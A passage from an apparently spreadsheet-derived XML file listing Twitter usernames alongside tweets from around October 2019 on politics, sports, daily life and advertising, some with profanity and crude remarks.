    <t>Adam Schiff too 'biased' to lead Trump impeachment probe, Rep. Jim Jordan tells Hannity https://t.co/rbtwBf2Qn2 #FoxNews</t>
  </si>
  <si>
    <t>chad_aucoin</t>
  </si>
  <si>
    <t>@JudgeMcGriff alright cool, its just gotta be in by 12:00pm (noon) EST. We’ll have it reviewed and processed at midnight tonight along wjth the other race transfers. The transfer portal is wild man.</t>
  </si>
  <si>
    <t>BillyCordero7</t>
  </si>
  <si>
    <t>@HecticTKS I threw a ps4 controller against the carpet on the floor and it bounced into the tv. Rip tv. But I haven’t thrown anything since, lesson learned.</t>
  </si>
  <si>
    <t>oufenix</t>
  </si>
  <si>
    <t>@j_b_cline @LaikenJordahl @DeanBaker13 @NPCA Look at you using those big words! And they're all spelled right! Now run along and play with all the other geezers. Someone should be around to check your diaper anytime now.</t>
  </si>
  <si>
    <t>IndySpiritus</t>
  </si>
  <si>
    <t>@microcarpa1 Japan's Olympics volunteers, even in eastern Tokyo Olympics venues, aren't being told about the serious threats to their health long-term from the Fukushima nuclear disaster radioactive fallout.</t>
  </si>
  <si>
    <t>carmenhill</t>
  </si>
  <si>
    <t>Only 13% of B2B marketers believe they have a firm grasp on how to integrate data into CRM systems. @BerrakBiz #MPB2B</t>
  </si>
  <si>
    <t>PolariChat</t>
  </si>
  <si>
    <t>@ITVBorderRB @ITVborder @ColinSmythMSP @MBallantyneMSP @MathesonMichael @JohnFinnieHI Thank you @ColinSmythMSP for proposing and strongly arguing for amendment 154 which would have required bus operators to produce accessible information on request and provide disability training to bus drivers every 2 years. Thank you also to @scotlibdems &amp; @scotgp for supporting</t>
  </si>
  <si>
    <t>BarkleyDFD</t>
  </si>
  <si>
    <t>@theKitsios @SorelyBoy @tnewtondunn Oh get real. We are not some unenlightened, deluvian state. Good practice was a UK ideal long before the EU was even dreamt of. We don't need Brussels to show us how it's done.</t>
  </si>
  <si>
    <t>ETSigstr</t>
  </si>
  <si>
    <t>4-0 top of the 1st. I’ll take it. @Cardinals #NLDS</t>
  </si>
  <si>
    <t>loryurr</t>
  </si>
  <si>
    <t>👅 Get back in the game with some sporty girls in sports bras (32 Photos) https://t.co/yqGlzYCTct</t>
  </si>
  <si>
    <t>stlcty03</t>
  </si>
  <si>
    <t>@MrNoFollowers I remember saying to someone if he falls to 8 we will trade up to get him. He fell to 9 and we made that trade. I was super geeked.</t>
  </si>
  <si>
    <t>NasIayer</t>
  </si>
  <si>
    <t>3.8 million girls exist and none will date me. All I do is masturbate and hope I die...what am I doing wrong?</t>
  </si>
  <si>
    <t>TThriftlove</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Vintage Reebok sandals. https://t.co/LLH0rtgm88 via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>DonaldWBond</t>
  </si>
  <si>
    <t>@hotpotato01 I got to wear a jacket today!</t>
  </si>
  <si>
    <t>Tasmin_Dawes</t>
  </si>
  <si>
    <t>The girl that asked me if I sleep on my face because my face is full of lines didn't bother me at all 👀😂 https://t.co/epb5RfBqOC</t>
  </si>
  <si>
    <t>sun_rise_d</t>
  </si>
  <si>
    <t>@piercearrow33 Hey now, where was my cupcake for my coffee this morning babes!! Lol!! 😂😂</t>
  </si>
  <si>
    <t>MarkeyDelRey</t>
  </si>
  <si>
    <t>@SawftFox When they do decide to remake this game I will be first in line</t>
  </si>
  <si>
    <t>SunderousDunks</t>
  </si>
  <si>
    <t>@fortworthpd Sometimes these cases are complicated, but this one is easy. The officer murdered an innocent woman in her own home. Really hope he's tried and convicted and appropriately sentenced. Gives police everywhere a bad name.</t>
  </si>
  <si>
    <t>danielgonline</t>
  </si>
  <si>
    <t>One for @lessonswithluis from @thatslifeAU: https://t.co/0bcAPwot4j</t>
  </si>
  <si>
    <t>_mer119</t>
  </si>
  <si>
    <t>How has it been almost 3 years at uni and I still don’t know the names of people I see almost every lecture??</t>
  </si>
  <si>
    <t>ehimgood_</t>
  </si>
  <si>
    <t>@___Colb___ Let’s make it to the playoffs first how bout that ....</t>
  </si>
  <si>
    <t>LikeDenver</t>
  </si>
  <si>
    <t>I should stop being cheap and buy a new phone</t>
  </si>
  <si>
    <t>DCMarvelEnt83</t>
  </si>
  <si>
    <t>So @Disney &amp; @MarvelStudios, Are you trying to tell me I'm not allowed to shorten my because you own the word "marvel"? I mean, I didn't hear @wbpictures or @DCComics pitching a fit about it...🤷‍♂️🤷‍♂️🤷‍♂️ https://t.co/Hw8p39d9vH</t>
  </si>
  <si>
    <t>GarciaDarrin</t>
  </si>
  <si>
    <t>@SteveFink_SID He doesn't have to be sooo defensive😂</t>
  </si>
  <si>
    <t>Karst97Redtail</t>
  </si>
  <si>
    <t>@RVAwonk Yup. Makes the US look very weak.</t>
  </si>
  <si>
    <t>southernbellem5</t>
  </si>
  <si>
    <t>@SenateDems I believe equal protection is the law of the land. This is an unnecessary case.🙄</t>
  </si>
  <si>
    <t>Skyebaby8Susan</t>
  </si>
  <si>
    <t>@JuliaMorales Friday is perfect for us in UK 🇬🇧 (sorry very selfish of me)</t>
  </si>
  <si>
    <t>m_collings</t>
  </si>
  <si>
    <t>@AlanPar46565002 I think their apoliticism is a serious problem particularly as it causes them when they do attempt to express a political thought to just mindlessly parrot right wing insults against the left. Beggars can’t be choosers though: they have done something truly revolutionary.</t>
  </si>
  <si>
    <t>food_writer</t>
  </si>
  <si>
    <t>@TrishDeseine Sorry have been exploring AF (and boozy) drinks in Sweden but thank you SO much for those kind words, Trish 😘😘</t>
  </si>
  <si>
    <t>JeffcoAds</t>
  </si>
  <si>
    <t>Halloween Bash 09/03/2019 ——————————————— Fantastic Time as always at @theburgerinn50 Show! ——————————————— Can learn more about the advertising we offer local businesses at https://t.co/il2yFhpGjy 📈</t>
  </si>
  <si>
    <t>longhorn525</t>
  </si>
  <si>
    <t>@FantasyAlarm 1pt ppr. David Montgomery for Tevin Coleman? Thanks</t>
  </si>
  <si>
    <t>TheHydecka</t>
  </si>
  <si>
    <t>@atrupar And he might be a s*** president but at least he's trying to help our economyif you're worried about the environment go buy some f****** solar panels or something and if you're worried about this stuff going on another country then go get involved yourself</t>
  </si>
  <si>
    <t>beltorchikas</t>
  </si>
  <si>
    <t>i love to look stupid https://t.co/kQvJqrdBVt</t>
  </si>
  <si>
    <t>JackGNini</t>
  </si>
  <si>
    <t>@MrMattJay Does this mean we won’t figure out video games until the 2040’s.</t>
  </si>
  <si>
    <t>DexBoltzmann</t>
  </si>
  <si>
    <t>Pleased to inform you guys that I got the position at Petco!! 50% off reptiles tomorrow!!!</t>
  </si>
  <si>
    <t>DavinaAdvocate</t>
  </si>
  <si>
    <t>@cindycreem @ResolveNewEng I am proud you are my Senator. You are smart, thoughtful, and compassionate when you lead. I am grateful you saw the value of sponsoring An Act Relative to Preserving Infertility.</t>
  </si>
  <si>
    <t>timmyc98</t>
  </si>
  <si>
    <t>What the fuck</t>
  </si>
  <si>
    <t>JEM326054</t>
  </si>
  <si>
    <t>Today I need the entire state of Iowa to be swept.</t>
  </si>
  <si>
    <t>ben_jamminpdx</t>
  </si>
  <si>
    <t>All San Jose needs to win this match is a little more negligent, fucking horrible refereeing by @PROreferees and judging by how it’s gone so far, they have a great chance of getting it. #RCTID #PORvSJ</t>
  </si>
  <si>
    <t>killershorts</t>
  </si>
  <si>
    <t>@clarktom98 Thanks for submitting, Thomas! 😈</t>
  </si>
  <si>
    <t>3stars4genflynn</t>
  </si>
  <si>
    <t>@IWashington @realDonaldTrump @WhiteHouse @VanJones68 @donlemon @CNN Thanks for sharing, I watched the live, I think the young man, Ben 🤔 from Cameroon hit me the hardest. 😭❤️🇺🇸 such love #46 #GodBlessAmerica #Blessings</t>
  </si>
  <si>
    <t>Steady__Ready</t>
  </si>
  <si>
    <t>@Betty15370 Thank you cousin. Unfortunately we can't ship to PA (for now), but WV is available. 😎</t>
  </si>
  <si>
    <t>delpeckio</t>
  </si>
  <si>
    <t>@AriAster watched Midsommar twice in the past 3 days. Can’t wait for what’s next man.</t>
  </si>
  <si>
    <t>Team_Beanz_DDD</t>
  </si>
  <si>
    <t>@karenwales66 @DailyMailCeleb Can’t stand the woman! 😡</t>
  </si>
  <si>
    <t>acnelson93</t>
  </si>
  <si>
    <t>@SportsbkConsig @lindetrain @VSiNLive He cleans up well!</t>
  </si>
  <si>
    <t>StageDoorGuru</t>
  </si>
  <si>
    <t>“We’re gonna sing it again” • I was fortunate to join some of my dear friends this past Sunday to see Hadestown for a second time. I don’t like to say this is a “broadway show” because it’s so much more then that.… https://t.co/vUesfMtW7P</t>
  </si>
  <si>
    <t>Oats_81</t>
  </si>
  <si>
    <t>I just earned the 'Photogenic Brew (Level 23)' badge on @untappd! https://t.co/cpZ46w3KTA</t>
  </si>
  <si>
    <t>jhuot55</t>
  </si>
  <si>
    <t>Still can’t believe I climbed to the top of Mt. Pleasant over the weekend</t>
  </si>
  <si>
    <t>Buttigieg &amp; Klobuchar Lie Through their Teeth Attacking Elizabeth Warren on Medicare For All at Debate https://t.co/4QWwtgnWOY #OurRevolution #Bernie2020 #MedicareForAll</t>
  </si>
  <si>
    <t>_leeshmontana</t>
  </si>
  <si>
    <t>I should’ve known today was gonna be a day when i walked into my job &amp; they were playing the “cotton eye joe” at 7am 😅</t>
  </si>
  <si>
    <t>MSGof203</t>
  </si>
  <si>
    <t>“You sent the addy I came niggah , only me and my main niggahs “</t>
  </si>
  <si>
    <t>BelleJoielle</t>
  </si>
  <si>
    <t>@MissyElliott My daughter entered into a Vanz tennis shoe design contest. These are her 2 designs. You can vote everyday until October 13. We would really like your votes!!!! 😁 https://t.co/O2TOHTHz0l… You can vote from your computer, iPad, and phone daily. Use the link above. Thank you!</t>
  </si>
  <si>
    <t>LaquieshaIsLove</t>
  </si>
  <si>
    <t>@bombmerica @KeyaaaaaaaB Ima delete my shit if that's the case cuz I be going thru shit &amp; twitter dont need to make it worst</t>
  </si>
  <si>
    <t>RevShark</t>
  </si>
  <si>
    <t>The bad news is that this market is offering no trading edge. The good news is we can now trade for free.</t>
  </si>
  <si>
    <t>Sheindie</t>
  </si>
  <si>
    <t>@Ole_pappy HI .. unless I come over to you direct I never see your tweets.. guessing you don't see mine? KAG</t>
  </si>
  <si>
    <t>jojosjesus</t>
  </si>
  <si>
    <t>@ScottFordTVGuy ..to in the future control gays and women.. Just a thought!</t>
  </si>
  <si>
    <t>imjustcain</t>
  </si>
  <si>
    <t>@linusnhiscamera i can just hear the post “meow”. like yoooo did I say i wanted a picture? haha</t>
  </si>
  <si>
    <t>MongoSlade64</t>
  </si>
  <si>
    <t>That homeless guy is back again at the mall shouting, “The sun is a star, the earth is a planet but the moon is a moon! Deal with it you MF’s!” Then he jumped in the fountain over by Leggo Land.</t>
  </si>
  <si>
    <t>AVLIYVH</t>
  </si>
  <si>
    <t>i’m trying to be Beatrix Kiddo for halloween</t>
  </si>
  <si>
    <t>SpicyVFX</t>
  </si>
  <si>
    <t>@riiotfx Might have to try one tbh since forts gone lmao</t>
  </si>
  <si>
    <t>CofflandGary</t>
  </si>
  <si>
    <t>@realDonaldTrump I, in my great and unmatched wisdom, am the Dean of Dumbfuckery University</t>
  </si>
  <si>
    <t>Venomshusband</t>
  </si>
  <si>
    <t>Honestly, I’d thank p*ers m*rgan for this past week because now I have a fuck tonne of information for my now v specific dissertation</t>
  </si>
  <si>
    <t>glamkirs</t>
  </si>
  <si>
    <t>u got a diamond boy, u better act like it.. u messing with the baddest u ain’t gotta cap like it🥶 https://t.co/RSxPafIKGa</t>
  </si>
  <si>
    <t>tweetachromat</t>
  </si>
  <si>
    <t>@JamesUrbaniak The proper response to his statement is “Good.”</t>
  </si>
  <si>
    <t>AudreyLoveBts</t>
  </si>
  <si>
    <t>@JL_Kdiamond @BTS_twt Hang on... did i miss something? Am i the only one who don't know what's going on?</t>
  </si>
  <si>
    <t>BigAtrain23</t>
  </si>
  <si>
    <t>When I start acting different with some of y’all, mind ya business and keep it moving</t>
  </si>
  <si>
    <t>lilbloodclot</t>
  </si>
  <si>
    <t>I would let ryan choke me to death and I will find a way to make it happen</t>
  </si>
  <si>
    <t>manishsinghAU</t>
  </si>
  <si>
    <t>@garyleff @AmericanAir Isn't there usually a narration somewhere that says (your flights with Vueling will be in economy) hence expect an economy ticket? We get that in this part of the world with QANTAS/Jetstar Asia codeshares as an example :)</t>
  </si>
  <si>
    <t>miahcuh</t>
  </si>
  <si>
    <t>@KoolAidDogan @AlbertoFCB123 @ModalSevenths Yo imagine strawmanning the imagine argument by strawmanning a strawman while being a strawman of another strawman. Dafuq wrong wit yu peasants</t>
  </si>
  <si>
    <t>DeRionP</t>
  </si>
  <si>
    <t>Its like no matter how hard i try i can’t pass shit and its really getting to me</t>
  </si>
  <si>
    <t>ibobbywhite</t>
  </si>
  <si>
    <t>@realDonaldTrump @Rasmussen_Poll consistently writes about his own qualities and replaces his name with his adversaries’ to attack them. What a lazy twitter writing staff. 45’s TWITTER STAFF HAS ZERO CREATIVITY. Complain about your boss and fill in someone else’s name, really lazy.</t>
  </si>
  <si>
    <t>newsjsUS</t>
  </si>
  <si>
    <t>Radford University student Luisa Cutting sentenced in roommate's murder, says she did ‘cocaine with the devil’ https://t.co/gNrtGE2DTZ</t>
  </si>
  <si>
    <t>TheNutter64</t>
  </si>
  <si>
    <t>@supercars @PenriteOil So happy for Dick Johnson.</t>
  </si>
  <si>
    <t>squintanilla85</t>
  </si>
  <si>
    <t>@Alyssa_Milano And people of color! All these white men are making decisions about our future!</t>
  </si>
  <si>
    <t>BEENxOMO_</t>
  </si>
  <si>
    <t>@souljamyles Me and you damn near the same person when it comes to shit like this💀 nigga really taught me the game and told me what i choose to do with this information is on me and i been livin life ever since</t>
  </si>
  <si>
    <t>charlescoles</t>
  </si>
  <si>
    <t>Amber Guyger is found guilty of murder in the shooting death of Botham Jean in his apartment - CNN https://t.co/Io6Ie73Utx</t>
  </si>
  <si>
    <t>DSC_Difference</t>
  </si>
  <si>
    <t>@Gingerheaddad @liz_hallett @SamLapradeCFRE @tclaybuck @DenisaCasement @johnlepp @ToastFundraiser @AnnBRosenfield @thejoannablack @tanialittle @Qaoileann @CathyJMann @mikeduerksen @thewhinydonor @LeahEustace @EphraimGopin @EmmaLewzey @fundraisermaeve @heather_jewell @GoCooper @KenWyman @CharitableLaura @UinvitedU @NPOfriend Not sure about push polls. Any question which in itself suggests the answer to the respondent is what I'm looking for. Preferably on donor surveys, but other audiences are fine I guess.</t>
  </si>
  <si>
    <t>ItsTeirXO</t>
  </si>
  <si>
    <t>Royals, Below are the rules of the Goodreads giveaway, so please rate AND review to qualify, granted that you've read the book. The reviews are important as they give new potential readers an array of different opinions regarding the book. Your support means the world to me!😘 https://t.co/pOkCSfTMuQ</t>
  </si>
  <si>
    <t>Blak_Buddy</t>
  </si>
  <si>
    <t>Ferreting out discrepancies, secrets, or lies may seem like ch... More for Capricorn https://t.co/lHrOomExsZ</t>
  </si>
  <si>
    <t>ElizabethRayy1</t>
  </si>
  <si>
    <t>Im often given nasty looks when I tell people I live a pure life. It’s funny that people find my Soul tie free, safe life funny! I’m laughing because I’m doing what GOD wants me to do! Do you think I’ll fail doing that?!</t>
  </si>
  <si>
    <t>valleyautogrou1</t>
  </si>
  <si>
    <t>2013 Chrysler 300 4dr Sdn RWD ** White ** Sedan 4 Doors - $16889 - to view more details go to https://t.co/CXAunn9cwR</t>
  </si>
  <si>
    <t>ryanhutchins</t>
  </si>
  <si>
    <t>Murphy’s $235M spending freeze beginning to take a toll, some recipients tell ⁦@klandergan⁩ and ⁦@CarlySitrin⁩. https://t.co/zqpB95HS58</t>
  </si>
  <si>
    <t>zabdielqt</t>
  </si>
  <si>
    <t>I would like to see it. send tweet.</t>
  </si>
  <si>
    <t>@LancelotLinkSpy @GeoffUtley @KimpsonForSC @MurdockResists Just right when you're trying to evade the long arm of the law. https://t.co/6fyLwCrBZN</t>
  </si>
  <si>
    <t>william_dennee</t>
  </si>
  <si>
    <t>@liberal_party @JustinTrudeau Why does your so called plan exempt large industrial polluters? Is it because they donate to the Liberal Party or because they pay for @JustinTrudeau and his lousy rip off paid speeches?</t>
  </si>
  <si>
    <t>tracymoscato</t>
  </si>
  <si>
    <t>@TermineRadio Interesting, Curry is going to find out how to carry a team like Harden had to do last year.</t>
  </si>
  <si>
    <t>herold_tyler</t>
  </si>
  <si>
    <t>@VeganGenesis @glxsscherry Ive never hunted but I think hunters are actually the ones that keep habitats at a healthy balance that the habitat can support. Thats why there are different hunting seasons. So while most of y’all scream for conservation and hate hunters at the same time is foolish, fuck trophy</t>
  </si>
  <si>
    <t>jww372</t>
  </si>
  <si>
    <t>Haven’t had Pringle’s in a long time. Cap doesn’t hook underneath anymore or is it the weed? If it’s the weed, buying more. #420life</t>
  </si>
  <si>
    <t>taxmeless</t>
  </si>
  <si>
    <t>@ChrisJZullo @realDonaldTrump You Elite Dems will figure a way to pay for it with working people’s money.. Venezuela has plenty of openings for all of you!</t>
  </si>
  <si>
    <t>LouDoench</t>
  </si>
  <si>
    <t>@cognusau @milfgaardian @XilDizzle Learning to cook is what nabbed me my Girl. 16 years as a kept man later I’m happy</t>
  </si>
  <si>
    <t>IVI3Creations</t>
  </si>
  <si>
    <t>@frozngrapes @kyeluh That was the joke 😂</t>
  </si>
  <si>
    <t>queensbee4</t>
  </si>
  <si>
    <t>Ah yes, women love when you recycle rings. Really shows how thoughtful and in love you are. #90DayFiance https://t.co/Kbbg7KRJ2z</t>
  </si>
  <si>
    <t>TedHunter1</t>
  </si>
  <si>
    <t>Tips and tricks for a successful content marketing campaign - ValueWalk https://t.co/VqEE1q3cSB</t>
  </si>
  <si>
    <t>sdceltic1</t>
  </si>
  <si>
    <t>Let’s get wired in Celtic !! I see SHVED on the bench too.. CHRISTIE a big miss , but we should have more than enough today HH https://t.co/c60kkev5Ig</t>
  </si>
  <si>
    <t>JaceScrom</t>
  </si>
  <si>
    <t>@_teenagewaste_ Ok so WHATS UP</t>
  </si>
  <si>
    <t>AndyPearson68</t>
  </si>
  <si>
    <t>@egre147 🤞🏼 for it</t>
  </si>
  <si>
    <t>jenn_page89</t>
  </si>
  <si>
    <t>Not going to lie, I'm kind of hoping to see @DaleJr since he is partners with @BlakeKochRacing for @FilterTime.</t>
  </si>
  <si>
    <t>MOTSUtambo</t>
  </si>
  <si>
    <t>@griller_117 That’s uncalled for.</t>
  </si>
  <si>
    <t>LachTalk</t>
  </si>
  <si>
    <t>@MarcusGreenWDRB @SpectrumNews1KY @WDRBNews put it on the Underhill account.</t>
  </si>
  <si>
    <t>ElPrem1</t>
  </si>
  <si>
    <t>@bbclaurak It would almost certainly fail before the Courts and Johnson would likely be held in contempt. He has certainly received this legal advice.</t>
  </si>
  <si>
    <t>SBryanM</t>
  </si>
  <si>
    <t>11 friggen days to go!!! The seating chart is done and ready and I'm so excited!!!!! Today Desi &amp; I rehearsed our song in our wedding outfits and she is going to look so gorgeous !!!!! 🎉😍💚</t>
  </si>
  <si>
    <t>ProfessorKaren</t>
  </si>
  <si>
    <t>@CastlereaghA I should have said 2017 was worse for fdi than 2018, a slight recovery, but the downward trend has been a decade in the making. Not all attributable to recent foreign policy or political risk in KSA, but larger trends in global economy.</t>
  </si>
  <si>
    <t>Nicollehansons</t>
  </si>
  <si>
    <t>[Download] Kindle WordPress Masterbook 2018: - Make a Website From Scratch For Total Beginners (Masterbook Series) &gt;&gt; https://t.co/lMaAROPlZD</t>
  </si>
  <si>
    <t>ingher</t>
  </si>
  <si>
    <t>@dcexaminer @TulsiGabbard @HillaryClinton Not a fan of Hillary but both Tulsi and Stein should “zip “ their lips</t>
  </si>
  <si>
    <t>AyE_3yE</t>
  </si>
  <si>
    <t>@Senae_ Falls in the Avatar category... cause it was definitely A1</t>
  </si>
  <si>
    <t>Gilduraan</t>
  </si>
  <si>
    <t>@SavinTheBees Lemon with a hint of honey. ...and coochie.</t>
  </si>
  <si>
    <t>LizAnn5869</t>
  </si>
  <si>
    <t>Well, we can actually see the #magicKingdom fireworks from Epcot. Which is nice, since #epcotforever doesn’t seem to be happening.</t>
  </si>
  <si>
    <t>FNGraham</t>
  </si>
  <si>
    <t>@saskedchat Available everyday anywhere. Avoid thinking big &amp; dig into whatever will help you grow. #saskedchat The #milestonepdchallenge is an example.</t>
  </si>
  <si>
    <t>esavep</t>
  </si>
  <si>
    <t>We supply Heat pumps #UFH Ecocents &amp; #MVHR to @gibbsanddandy who have 28 branches serving professionals in the local building trade https://t.co/Vj6nqgnjeq</t>
  </si>
  <si>
    <t>kaylamchl</t>
  </si>
  <si>
    <t>@Icyshaneee the ultimate glo</t>
  </si>
  <si>
    <t>jclaudio81</t>
  </si>
  <si>
    <t>@Timcast Hypocrisy is a disease. It's cancer. It needs to be cut out from the heart of America. Hate to say it but I see it is going to much worse. I don't see it getting better anytime soon. I don't like it being negative but I prefer being a realist.</t>
  </si>
  <si>
    <t>f_lbear</t>
  </si>
  <si>
    <t>All I need this Halloween is my bong, a bowl of Reese’s and the Halloween movie franchise.</t>
  </si>
  <si>
    <t>blacksqonkclub</t>
  </si>
  <si>
    <t>i just realized i’ve been playing drums for 5 years holy shit</t>
  </si>
  <si>
    <t>Mojave_Sean</t>
  </si>
  <si>
    <t>@NauticaWu @atypicalasian_ /- this page tells the issues conservatives support, and the President supports most of these. But -/ https://t.co/VpMka230PX</t>
  </si>
  <si>
    <t>spskeen</t>
  </si>
  <si>
    <t>I finally got around to adding some archived photos to my Photo library. This might be my new favourite. What a pose. 💁‍♂️ https://t.co/TvwOOEVwJt</t>
  </si>
  <si>
    <t>MOlmeda97</t>
  </si>
  <si>
    <t>Adopting a sustainable pace lands you at your destination on t... More for Taurus https://t.co/CYUjNsVDyT</t>
  </si>
  <si>
    <t>timmycaunce</t>
  </si>
  <si>
    <t>@Christhevamp Yes!!!! Of course I do you've gone from a 10 to an 11 😍</t>
  </si>
  <si>
    <t>SketchLisa</t>
  </si>
  <si>
    <t>I succumbed to the trade stands too. A bamboo fruit/veg basket. It’s adorable. https://t.co/MGWHq5aaMo</t>
  </si>
  <si>
    <t>MaggiSchubert</t>
  </si>
  <si>
    <t>@arikarmstead It’s great to see it all come together for you! Hard, perseverance + patience. Dedication....</t>
  </si>
  <si>
    <t>BamaGal_inTexas</t>
  </si>
  <si>
    <t>@SM0KEDAWG_ He’s horrible — I would mute my tv but the remote is too far away #FirstWorldProblems</t>
  </si>
  <si>
    <t>Truth5471</t>
  </si>
  <si>
    <t>But this is ok because it’s Democrats doing it. But they want to impeach Trump who has done nothing ———-John Kerry's comments on foreign leaders during 2004 election season resurface amid Trump-Ukraine controversy | Fox News https://t.co/I4gAUHcHS4</t>
  </si>
  <si>
    <t>chicojimj</t>
  </si>
  <si>
    <t>@LindseyGrahamSC @SpeakerPelosi Pelosi is correct about "weak Republicans".... when Republicans controlled both houses not a DAMN THING was done!! And, Republicans, including you, kiss Trump butt every chance they can!! So Graham TAKE A SEAT</t>
  </si>
  <si>
    <t>squeezeboxxx666</t>
  </si>
  <si>
    <t>On the plus side I haven’t ate in over 24 hours</t>
  </si>
  <si>
    <t>dajc12345</t>
  </si>
  <si>
    <t>oHo - wanna win John Bramwell's guitar? Or Ben Crompton's plastic Axe? #gameofthrones #iamkloot #johnbramwell #iamthesky - there's a ton of crazy brilliant prizes to win - - https://t.co/AxHPqWEvXJ via @iamjohnbramwell</t>
  </si>
  <si>
    <t>frederickded</t>
  </si>
  <si>
    <t>Major Downtown adaptive reuse project continues to move forward https://t.co/f51zZWvjpM</t>
  </si>
  <si>
    <t>ShabbaElaine</t>
  </si>
  <si>
    <t>People may feel quite enchanted and heartened by your words to... More for Virgo https://t.co/lNBPtShv8H</t>
  </si>
  <si>
    <t>RoyceGomez</t>
  </si>
  <si>
    <t>A great talk on envisioning and becoming the person YOU want to be! https://t.co/u7djHYEjSq</t>
  </si>
  <si>
    <t>R4FFY_T4FFY</t>
  </si>
  <si>
    <t>@TheYoungHazard Bro I always get super mad anytime anybody gets close to me with a vehicle</t>
  </si>
  <si>
    <t>dudeofmemes</t>
  </si>
  <si>
    <t>@TomCruise needs to play John McCaine in a Die Hard reboot.</t>
  </si>
  <si>
    <t>juleqt2</t>
  </si>
  <si>
    <t>@bryanboyne @matthewjdowd @EmeraldRobinson @NVGOP @ewarren @realDonaldTrump Worse, they are being taught is tax sheltered propaganda gatherings each and every Sunday!</t>
  </si>
  <si>
    <t>Sir_JimMoriarty</t>
  </si>
  <si>
    <t>@NobilisMendax “It has it all.” James chuckled. He took out his phone and called Irene.</t>
  </si>
  <si>
    <t>joe_rockabilly</t>
  </si>
  <si>
    <t>@LeedsUnitedYEP Great use of the past tense there.</t>
  </si>
  <si>
    <t>🏇Check out the Sporting Life tip in the next race at York... 1. Rosa 2. Spirit Of The Sky 3. Abstemious 📱Bet and watch on the Sky Bet app.</t>
  </si>
  <si>
    <t>clarkraykent</t>
  </si>
  <si>
    <t>@iamdabinlee Your music is perfect. Your friendships with @ILLENIUMMUSIC @SaidTheSky @day_gatsby @itswilliamblack is perfect. Your support of other artists and all music is perfect. You’re amazing and perfect man! https://t.co/HLO7H35DMv</t>
  </si>
  <si>
    <t>DuckFootball</t>
  </si>
  <si>
    <t>One of the best runs all season by CJ Verdell, and the Ducks are on the move. #GoDucks</t>
  </si>
  <si>
    <t>jackand_JiLL13</t>
  </si>
  <si>
    <t>@erin_raye_ I love you so much let me know if you need to talk</t>
  </si>
  <si>
    <t>Scholty</t>
  </si>
  <si>
    <t>@magamamatexas @theUPterground @Baylor Listen to the scanner. https://t.co/eCG96H4UFk</t>
  </si>
  <si>
    <t>WPMassey</t>
  </si>
  <si>
    <t>Struck this morning the encounter leading up to the parable of The Good Samaritan. How much of my life is spent trying to justify myself?</t>
  </si>
  <si>
    <t>lkrchrds</t>
  </si>
  <si>
    <t>@MartyKnutsen @acjimbo @TheTotallyShow @honigstein @lynseyhooper @oilysailor The Bayern attack mainly.</t>
  </si>
  <si>
    <t>lStrictlyLogicl</t>
  </si>
  <si>
    <t>Just ate some well done fries and Spicy korean wings from Wingstop 😋😍 bomb af @Stoax thanks for teaching me the ways of the well done fries 😂</t>
  </si>
  <si>
    <t>hnrysmll</t>
  </si>
  <si>
    <t>@jrdjms Are you going to be re posting your reading of your short story I missed that content</t>
  </si>
  <si>
    <t>adrianmarston_</t>
  </si>
  <si>
    <t>Okay but I need that playlist they’re using in the Atlas. I’m tired of shazaming.</t>
  </si>
  <si>
    <t>3PuttJack_</t>
  </si>
  <si>
    <t>@SkinzerHTTR We bring home the bacon 🥓</t>
  </si>
  <si>
    <t>KingNormies</t>
  </si>
  <si>
    <t>https://t.co/1ab4Pvn3Ga DataPath Announces Addition of HSA Administration and Investments in Cloud-Based Summit PlatformDataPath’s fully-unified Summit platform becomes the industry’s only cloud-based solution to feature FSA, HRA, HSA and COBRA administration capabilities.Lit...</t>
  </si>
  <si>
    <t>1063THEBUZZ</t>
  </si>
  <si>
    <t>Hockey to Return to #WichitaFalls in 2020 https://t.co/pGX2DKackN</t>
  </si>
  <si>
    <t>tiredearthling</t>
  </si>
  <si>
    <t>real talk if i has the money i would literally donate every piece of clothing i have right now and get an entire new wardrobe i’m tired of wearing the same 4 shirts for the last 5+ years</t>
  </si>
  <si>
    <t>FightinChance</t>
  </si>
  <si>
    <t>Trump publicly urges China to investigate Bidens amid impeachment inquiry - NBC News https://t.co/KKhHUK7TvJ</t>
  </si>
  <si>
    <t>madalynkathrynm</t>
  </si>
  <si>
    <t>@NickVinZant A beautiful couple and such a beautiful statement. I could almost cry. You're a very nice man and I'm sure she feels exactly the same! 👏👏👏💙💙</t>
  </si>
  <si>
    <t>Raygo23</t>
  </si>
  <si>
    <t>@Nationals Unbelievable! Congrats to the Nationals and their fans. Counted out before the season even started with the loss of Harper. Not only did you guys win a postseason series but are headed to the World Series! I’ll be rooting for you guys! Good Luck!</t>
  </si>
  <si>
    <t>T2Pneuma</t>
  </si>
  <si>
    <t>Prayer for the Fallen https://t.co/HhfegXt123 #faith #ethics #spirituality https://t.co/BQBT5bRa6i</t>
  </si>
  <si>
    <t>huttnatalya22</t>
  </si>
  <si>
    <t>🖖 Lookup humpday in the dictionary and you'll find Reno (33 Photos) https://t.co/biJJE8Y6NC</t>
  </si>
  <si>
    <t>GlenMiles</t>
  </si>
  <si>
    <t>@GoldenBearVlad @Pac12Network @Ask_Spectrum I moved to diff room it’s fine now</t>
  </si>
  <si>
    <t>margery_moran</t>
  </si>
  <si>
    <t>Blues Tribute for Mike Moran, Drums Los Angeles, California USA https://t.co/PEn8SxXHoK https://t.co/lT3VDJaERG</t>
  </si>
  <si>
    <t>e481franklin</t>
  </si>
  <si>
    <t>@realDonaldTrump This entire shit show is of your making and anything bad that happens is on you!</t>
  </si>
  <si>
    <t>Pardong69</t>
  </si>
  <si>
    <t>@lemonpeppah THE PROPHECY HAS BEEN FULFILLED, AS IT WAS FORETOLD IN THE ANCIENT SCROLLS</t>
  </si>
  <si>
    <t>GuillermoCJr</t>
  </si>
  <si>
    <t>As of rn the moderates are making a valid point. #DemDebate</t>
  </si>
  <si>
    <t>Unbeaten Liverpool show their mettle vs. Leicester, continue to have the look of champions https://t.co/2jO36otu7D https://t.co/RPx8u1BrAH</t>
  </si>
  <si>
    <t>Ajrivas</t>
  </si>
  <si>
    <t>@MattyBeRad @Kalynne31 @ReaganBattalion @AOC @ACC_National More to come</t>
  </si>
  <si>
    <t>wevicwooin</t>
  </si>
  <si>
    <t>@CNNPolitics He doesn’t know all the regulations of his job he’s just a figurehead</t>
  </si>
  <si>
    <t>bhayes2016</t>
  </si>
  <si>
